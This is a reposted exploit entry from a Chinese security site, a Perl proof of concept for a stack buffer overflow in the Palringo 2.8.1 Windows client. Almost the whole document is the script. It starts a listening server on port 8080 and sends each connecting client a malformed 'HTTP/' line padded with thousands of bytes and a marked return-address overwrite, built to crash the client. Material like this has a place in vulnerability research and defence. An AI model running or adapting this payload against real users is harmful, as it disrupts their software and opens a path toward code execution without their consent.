Palringo 2.8.1 - Stack Buffer Overflow (PoC)
|
来源:vfocus.net 作者:ALmfL9 发布时间:2015-01-21
|
|
#!/use/bin/perl # Exploit Title: palringo stack buffer overflow # Date: 10 January 2015 # Vulnerability discovered by: Mr.ALmfL9 # Vendor Homepage: http://www.palringo.com/ # Software Link: http://www.palringo.com/ar/sa/download/?get=winpc # Version: 2.8.1 # Tested on: Windows 8.1 use IO::Socket; $port = 8080; my $payload = "\x41" x 144; $payload = $payload. "\x42" x 4 ; $payload = $payload. "\x42" x 9000; $serv = IO::Socket::INET->new(Proto=>'tcp', LocalPort=>$port, Listen=>1) or die "Error: listen($port)\n"; while($cli=$serv->accept()){ print "[#] port is: $port\n"; print $cli "HTTP/$payload\r\n\r\n"; while(<$cli>){ print $cli;
} }
|
|
|
[推荐]
[评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|